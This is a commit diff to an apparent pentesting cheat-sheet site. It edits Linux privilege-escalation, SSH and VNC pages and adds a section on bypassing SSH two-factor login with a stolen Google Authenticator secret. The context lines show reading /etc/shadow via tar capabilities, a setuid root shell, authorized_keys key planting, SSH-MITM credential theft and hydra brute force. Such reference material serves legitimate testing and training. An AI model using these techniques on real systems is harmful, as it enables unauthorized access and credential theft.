updated wireshark cheat sheet and others

Author: hdks-bug

src/exploit/linux/privilege-escalation/index.md

@@ -18,14 +18,10 @@ There are some tools for investigating automatically.
 - [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
 - [Linux Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
 
-<br />
-
 ## Messages When Logged In
 
 After logged in the target system, don’t miss the messages. We might find interesting information.
 
-<br />
-
 ## OS Information
 
 ```sh
@@ -54,8 +50,6 @@ Linux examplehost 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x
 
 For example above, we can search **`ubuntu 4.4.0-31-generic`** in search engines.
 
-<br />
-
 ## Interesting Information
 
 ```sh
@@ -197,6 +191,7 @@ iptables -L -v -n
 # Messages
 cat /etc/issue
 cat /etc/motd
+cat /etc/update-motd.d/00-header
 
 # MySQL (MariaDB)
 cat /etc/mysql/my.cnf
@@ -269,9 +264,10 @@ apt list --upgradable | grep polkit
 
 # CPU usage
 htop
-```
 
-<br />
+# Find files modified recently (replace the datetimes)
+find / -type f -newermt "2025-04-01 00:00:00"  ! -newermt "2025-04-01 23:59:59"
+```
 
 ## Kernel Information
 
@@ -308,6 +304,14 @@ ll /lib/modules/
 # List symbols and addresses of kernel modules
 cat /proc/kallsyms
 
+# Get module information
+modinfo <module_name>
+modinfo example.ko
+
+# Investigate kernel module file
+strings example.ko | less
+objdump -D example.ko
+
 # CPU information
 cat /proc/cpuinfo
 
@@ -339,8 +343,6 @@ dmesg -l info
 dmesg -l user
 ```
 
-<br />
-
 ## Hardware Information
 
 ```sh
@@ -356,8 +358,6 @@ lspci
 ls /proc/bus/pci
 ```
 
-<br />
-
 ## SSH Public Key Forgery
 
 If we have write permission to `.ssh/authorized_keys`, we can insert our SSH public key to this file and login as the user.  
@@ -383,8 +383,6 @@ chmod 600 key
 ssh user@<target-ip> -i key
 ```
 
-<br />
-
 ## Open Ports
 
 ```sh
@@ -434,8 +432,6 @@ There are various methods to do that.
 
 Now we can access to `http://localhost:8080` in local browser. That means we now connected to `http://127.0.0.1:8080` of remote machine.
 
-<br />
-
 ## Running Processes
 
 ```sh
@@ -537,8 +533,6 @@ cat password.txt
 
 Now we get the current user password.
 
-<br />
-
 ## Process Tracing
 
 Sometimes we can retrieve the sensitive information by reading sequential processes with `stract`.
@@ -547,8 +541,6 @@ Sometimes we can retrieve the sensitive information by reading sequential proces
 strace -e read -p `ps -ef | grep php | awk '{print $2}'`
 ```
 
-<br />
-
 ## Running Services
 
 To list all running services in Linux, use the following command.
@@ -586,8 +578,6 @@ journalctl -u httpd
 journalctl -u sshd
 ```
 
-<br />
-
 ## Logging
 
 ```bash
@@ -620,8 +610,6 @@ We can watch logs in real time as below. `-f` option is used for dynamically out
 tail -f /var/log/syslog
 ```
 
-<br />
-
 ## Sensitive Files with Given Keywords
 
 The **"find"** command searches files in the real system.
@@ -697,8 +685,6 @@ We can exclude specific directory with `-not -path` option of `find` command.
 find / -name "*.txt" -not -path "/usr/share" 2>/dev/null
 ```
 
-<br />
-
 ## SUID/SGID (Set User ID/ Set Group ID)
 
 It allows users to run an executable as root privilege.
@@ -779,8 +765,6 @@ firejail --join=<PID>
 su -
 ```
 
-<br />
-
 ## Writable Directories & Files
 
 ```sh
@@ -791,8 +775,6 @@ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u
 find / -writable -name "*.service" 2>/dev/null
 ```
 
-<br />
-
 ## Capabilities
 
 To find files that are set capabilities.
@@ -854,8 +836,6 @@ LFILE=/etc/shadow
 tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
 ```
 
-<br />
-
 ## Set Capabilities
 
 ```sh
@@ -875,8 +855,6 @@ Then get a root shell.
 /home/<current-user>/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
 ```
 
-<br />
-
 ## Override /etc/passwd, /etc/shadow
 
 ### /etc/passwd
@@ -929,8 +907,6 @@ su root
 # password: password
 ```
 
-<br />
-
 ## Sensitive Contents in Files
 
 ```sh
@@ -964,8 +940,6 @@ grep -rE -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" ./
 grep -h root ./
 ```
 
-<br />
-
 ## Disks (Drives)
 
 List disks information on the target system.
@@ -995,8 +969,6 @@ mkdir -p /mnt/tmp
 mount /dev/xvda1 /mnt/tmp
 ```
 
-<br />
-
 ## Crack User Passwords
 
 If we can access **/etc/passwd** and **/etc/shadow** as well, we can crack user passwords using **unshadow** and **John The Ripper**.
@@ -1024,8 +996,6 @@ john --wordlist=wordlist.txt passwords.txt
 john --format=crypt --wordlist=wordlist.txt passwords.txt
 ```
 
-<br />
-
 ## Execute Commands as Root Privilege
 
 ### Change Shebang in Shell Script
@@ -1054,8 +1024,6 @@ root@machine:~/$ whoami
 root
 ```
 
-<br />
-
 ## Update Sensitive Information
 
 ### 1. Change Password of Current User
@@ -1093,8 +1061,6 @@ echo -n '<current-password>\n<new-password>\n<new-password>' | passwd
     su <new-user>
     ```
 
-<br />
-
 ## Display the Content of Files You Don't Have Permissions
 
 Using **"more"** command.
@@ -1109,8 +1075,6 @@ The text like "--More--(60%)" will be appeared.
 
 ### 4. Enter ':e ~/somefile'
 
-<br />
-
 ## Password Guessing
 
 ### Generate Passwords From Victim Information

src/exploit/network/protocol/ssh-pentesting.md

@@ -7,7 +7,7 @@ tags:
     - Privilege Escalation
 refs:
     - https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
-date: 2024-06-15
+date: 2025-04-03
 draft: false
 ---
 
@@ -57,8 +57,6 @@ Crack the password of the private key using the formatted text.
 john --wordlist=wordlist.txt hash.txt
 ```
 
-<br />
-
 ## Investigation
 
 ### Banner Grabbing
@@ -73,8 +71,6 @@ Also, **[ssh-audit](https://github.com/jtesta/ssh-audit)** is an useful tool for
 ssh-audit <target-ip>
 ```
 
-<br />
-
 ## Configuration Files
 
 ```bash
@@ -84,8 +80,6 @@ cat /etc/ssh/ssh_config
 cat /etc/ssh/sshd_config
 ```
 
-<br />
-
 ## Connect
 
 If you know a target credential, you can connect a remote server over SSH using the credential.
@@ -179,8 +173,6 @@ ssh domain-name\\username@domain-controller
     -----END RSA PRIVATE KEY-----
     ```
 
-<br />
-
 ## Transfer Files
 
 ### Send a File/Directory to Another Machine
@@ -205,8 +197,6 @@ scp -r user@<ip>:/home/<user>/path/to/file.txt .
 
 If you get error **“connection refused”**, the SSH server is not running in another machine. So you need to start the SSH server.
 
-<br />
-
 ## Create SSH Keys
 
 ### Generate Keys
@@ -228,8 +218,6 @@ In target machine,
 ssh-copy-id username@<target-ip>
 ```
 
-<br />
-
 ## Generate SSH Keys and Set Up Public Key to Connect Remote Machine
 
 ### 1. Check if authorized_keys Exists in Remote Machine
@@ -270,8 +258,6 @@ chmod 600 key
 ssh victim@<target-ip> -i key
 ```
 
-<br />
-
 ## SSH Server
 
 ### Start/Stop/Restart
@@ -330,8 +316,6 @@ sudo pkill -f pts/#
 grep 'sshd' /var/log/auth.log
 ```
 
-<br />
-
 ## SSH Proxy Server
 
 ### Sshuttle
@@ -365,8 +349,6 @@ Then you can access to other networks.
 
     Run sshuttle again.
 
-<br />
-
 ## SSH-MITM for Stealing Credentials
 
 If the target system user try to connect arbitrary host using SSH, we might be able to steal credentials by listening via the SSH man-in-the-middle server.  
@@ -380,4 +362,15 @@ pip3 install ssh-mitm --upgrade
 # --remote-host: Specify the target ip/domain
 # --listen-port: Specify the ip address to listen in local machine
 ssh-mitm server --enable-trivial-auth --remote-host example.com --listen-port 2222
-```
+```
+
+## 2FA Bypass
+
+When logging in to SSH with 2FA enabled, we will be asked for a **Verification Code**.
+
+### Google Authenticator
+    
+If the Google Authenticator is used, the secret key of TOTP can be stored in `$HOME/.google_authenticator` according to [the repo](https://github.com/google/google-authenticator-libpam).
+
+After getting the secret key, now access to [Online one-time password generator](https://totp.app/) and input the secret key, then get TOTP.  
+Now login SSH with `ssh` command and input the TOTP for verification code.

src/exploit/network/protocol/vnc-pentesting.md

@@ -4,7 +4,7 @@ description: VNC is a graphical desktop sharing system that uses the Remote Fram
 tags:
     - Network
 refs:
-date: 2024-01-08
+date: 2025-04-03
 draft: false
 ---
 
@@ -27,8 +27,6 @@ hydra -P passwords.txt vnc://<target-ip>
 hydra -P passwords.txt <target-ip> vnc
 ```
 
-<br />
-
 ## Connect
 
 ### Using Remmina
@@ -54,4 +52,6 @@ Then run the following command to connect:
 
 ```bash
 vncviewwer 10.0.0.1:5901
-```
+# with password file
+vncviewer -passwd ./passwd.txt 10.0.0.1:5901
+```